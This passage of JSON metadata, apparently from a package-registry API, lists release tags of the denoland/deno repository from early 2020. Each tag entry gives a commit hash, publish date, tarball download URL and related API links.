d%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0